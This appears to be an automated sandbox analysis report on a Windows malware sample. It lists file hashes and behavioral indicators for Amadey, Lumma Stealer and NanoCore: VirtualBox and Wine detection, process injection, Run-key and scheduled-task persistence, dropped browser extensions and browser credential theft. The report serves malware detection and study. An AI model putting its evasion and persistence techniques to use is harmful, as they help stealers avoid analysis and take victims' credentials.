| SHA512 | fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040 |
\ProgramData\nss3.dll
| MD5 | 1cc453cdf74f31e4d913ff9c10acdde2 |
| SHA1 | 6e85eae544d6e965f15fa5c39700fa7202f3aafe |
| SHA256 | ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5 |
| SHA512 | dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-08-13 22:07
Reported
2024-08-13 22:10
Platform
win10v2004-20240802-en
Max time kernel
150s
Max time network
152s
Command Line
Signatures
Amadey
Lumma Stealer, LummaC
NanoCore
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 3076 created 3432 | N/A | C:\Users\Admin\AppData\Local\Temp\40365\Beijing.pif | C:\Windows\Explorer.EXE |
| PID 3076 created 3432 | N/A | C:\Users\Admin\AppData\Local\Temp\40365\Beijing.pif | C:\Windows\Explorer.EXE |
| PID 4876 created 3432 | N/A | C:\Users\Admin\AppData\Local\Temp\193997\Restructuring.pif | C:\Windows\Explorer.EXE |
Credentials from Password Stores: Credentials from Web Browsers
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1bca90670ea01a05472c06449066d4a8ba53619a22b1ab993efe27e7326d0f9d.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\7zSC86C.tmp\Install.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1bca90670ea01a05472c06449066d4a8ba53619a22b1ab993efe27e7326d0f9d.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1bca90670ea01a05472c06449066d4a8ba53619a22b1ab993efe27e7326d0f9d.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zSC86C.tmp\Install.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\1000142101\build2.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\1bca90670ea01a05472c06449066d4a8ba53619a22b1ab993efe27e7326d0f9d.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\1000110001\runtime.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\1000131001\PctOccurred.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\1000132001\runtime.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\40365\Beijing.pif | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MindLynx.url | C:\Windows\SysWOW64\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MindLynx.url | C:\Windows\SysWOW64\cmd.exe | N/A |
Executes dropped EXE
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1bca90670ea01a05472c06449066d4a8ba53619a22b1ab993efe27e7326d0f9d.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
Indirect Command Execution
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\forfiles.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\forfiles.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\forfiles.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\forfiles.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\forfiles.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\forfiles.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\forfiles.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\forfiles.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\forfiles.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\forfiles.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\forfiles.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\forfiles.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\forfiles.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\forfiles.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\forfiles.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\forfiles.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\forfiles.exe | N/A |
Reads user/profile data of web browsers
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\WPA Monitor = "C:\\Program Files (x86)\\WPA Monitor\\wpamon.exe" | C:\Users\Admin\AppData\Local\Temp\1000147001\nano.exe | N/A |
Checks installed software on the system
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\1000147001\nano.exe | N/A |
Drops Chrome extension
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json | C:\Windows\Temp\gXItsKzEGiJHAsry\AmzrHRuAsSfdqRu\TFXDRjP.exe | N/A |
Drops desktop.ini file(s)
| Description | Indicator | Process | Target |
| File opened for modification | C:\$RECYCLE.BIN\S-1-5-18\desktop.ini | C:\Windows\Temp\gXItsKzEGiJHAsry\AmzrHRuAsSfdqRu\TFXDRjP.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE | C:\Windows\Temp\gXItsKzEGiJHAsry\AmzrHRuAsSfdqRu\TFXDRjP.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData | C:\Windows\Temp\gXItsKzEGiJHAsry\AmzrHRuAsSfdqRu\TFXDRjP.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 | C:\Windows\Temp\gXItsKzEGiJHAsry\AmzrHRuAsSfdqRu\TFXDRjP.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 | C:\Windows\Temp\gXItsKzEGiJHAsry\AmzrHRuAsSfdqRu\TFXDRjP.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies | C:\Windows\Temp\gXItsKzEGiJHAsry\AmzrHRuAsSfdqRu\TFXDRjP.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 | C:\Windows\Temp\gXItsKzEGiJHAsry\AmzrHRuAsSfdqRu\TFXDRjP.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache | C:\Windows\Temp\gXItsKzEGiJHAsry\AmzrHRuAsSfdqRu\TFXDRjP.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\54E176903A096E58E807B60E1BDFA85C | C:\Windows\Temp\gXItsKzEGiJHAsry\AmzrHRuAsSfdqRu\TFXDRjP.exe | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\system32\GroupPolicy\gpt.ini | C:\Users\Admin\AppData\Local\Temp\7zSC86C.tmp\Install.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\54E176903A096E58E807B60E1BDFA85C | C:\Windows\Temp\gXItsKzEGiJHAsry\AmzrHRuAsSfdqRu\TFXDRjP.exe | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | C:\Users\Admin\AppData\Local\Temp\7zSC86C.tmp\Install.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft | C:\Windows\Temp\gXItsKzEGiJHAsry\AmzrHRuAsSfdqRu\TFXDRjP.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 | C:\Windows\Temp\gXItsKzEGiJHAsry\AmzrHRuAsSfdqRu\TFXDRjP.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content | C:\Windows\Temp\gXItsKzEGiJHAsry\AmzrHRuAsSfdqRu\TFXDRjP.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1bca90670ea01a05472c06449066d4a8ba53619a22b1ab993efe27e7326d0f9d.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4876 set thread context of 456 | N/A | C:\Users\Admin\AppData\Local\Temp\193997\Restructuring.pif | C:\Users\Admin\AppData\Local\Temp\193997\Restructuring.pif |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files (x86)\WPA Monitor\wpamon.exe | C:\Users\Admin\AppData\Local\Temp\1000147001\nano.exe | N/A |
| File created | C:\Program Files (x86)\xFHhRZnoU\rvmgQR.dll | C:\Windows\Temp\gXItsKzEGiJHAsry\AmzrHRuAsSfdqRu\TFXDRjP.exe | N/A |
| File created | C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi | C:\Windows\Temp\gXItsKzEGiJHAsry\AmzrHRuAsSfdqRu\TFXDRjP.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi | C:\Windows\Temp\gXItsKzEGiJHAsry\AmzrHRuAsSfdqRu\TFXDRjP.exe | N/A |
| File created | C:\Program Files\Mozilla Firefox\browser\omni.ja.bak | C:\Windows\Temp\gXItsKzEGiJHAsry\AmzrHRuAsSfdqRu\TFXDRjP.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\browser\omni.ja.bak | C:\Windows\Temp\gXItsKzEGiJHAsry\AmzrHRuAsSfdqRu\TFXDRjP.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\browser\omni.ja | C:\Windows\Temp\gXItsKzEGiJHAsry\AmzrHRuAsSfdqRu\TFXDRjP.exe | N/A |
| File created | C:\Program Files (x86)\WPA Monitor\wpamon.exe | C:\Users\Admin\AppData\Local\Temp\1000147001\nano.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\ConfiguringUps | C:\Users\Admin\AppData\Local\Temp\1000132001\runtime.exe | N/A |
| File created | C:\Windows\Tasks\axplong.job | C:\Users\Admin\AppData\Local\Temp\1bca90670ea01a05472c06449066d4a8ba53619a22b1ab993efe27e7326d0f9d.exe | N/A |
| File opened for modification | C:\Windows\EquationExplorer | C:\Users\Admin\AppData\Local\Temp\1000110001\runtime.exe | N/A |
| File opened for modification | C:\Windows\ConfiguringUps | C:\Users\Admin\AppData\Local\Temp\1000110001\runtime.exe | N/A |
| File opened for modification | C:\Windows\EquationExplorer | C:\Users\Admin\AppData\Local\Temp\1000132001\runtime.exe | N/A |
| File opened for modification | C:\Windows\SysOrleans | C:\Users\Admin\AppData\Local\Temp\1000132001\runtime.exe | N/A |
| File opened for modification | C:\Windows\HostelGalleries | C:\Users\Admin\AppData\Local\Temp\1000132001\runtime.exe | N/A |
| File opened for modification | C:\Windows\ExplorerProprietary | C:\Users\Admin\AppData\Local\Temp\1000132001\runtime.exe | N/A |
| File created | C:\Windows\Tasks\bPUvzXzfJRZdhTmsKY.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File opened for modification | C:\Windows\ChestAntique | C:\Users\Admin\AppData\Local\Temp\1000110001\runtime.exe | N/A |
| File opened for modification | C:\Windows\SysOrleans | C:\Users\Admin\AppData\Local\Temp\1000110001\runtime.exe | N/A |
| File opened for modification | C:\Windows\ExplorerProprietary | C:\Users\Admin\AppData\Local\Temp\1000110001\runtime.exe | N/A |
| File created | C:\Windows\Tasks\XsUoLYLFLViNzfg.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File opened for modification | C:\Windows\HostelGalleries | C:\Users\Admin\AppData\Local\Temp\1000110001\runtime.exe | N/A |
| File created | C:\Windows\Tasks\Hkbsse.job | C:\Users\Admin\AppData\Local\Temp\1000142101\build2.exe | N/A |
| File created | C:\Windows\Tasks\XvjVthUohNRwdLXcW.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File opened for modification | C:\Windows\TreeProfessor | C:\Users\Admin\AppData\Local\Temp\1000110001\runtime.exe | N/A |
| File opened for modification | C:\Windows\ChestAntique | C:\Users\Admin\AppData\Local\Temp\1000132001\runtime.exe | N/A |
| File opened for modification | C:\Windows\TreeProfessor | C:\Users\Admin\AppData\Local\Temp\1000132001\runtime.exe | N/A |
Enumerates physical storage devices
Program crash
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\forfiles.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\findstr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | \??\c:\windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\findstr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\forfiles.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | \??\c:\windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1000147001\nano.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\gpupdate.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\findstr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1000137101\1111.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\forfiles.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\forfiles.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\forfiles.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | \??\c:\windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\forfiles.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1000110001\runtime.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\forfiles.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\findstr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC86C.tmp\Install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | \??\c:\windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | \??\c:\windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\findstr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\findstr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\choice.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
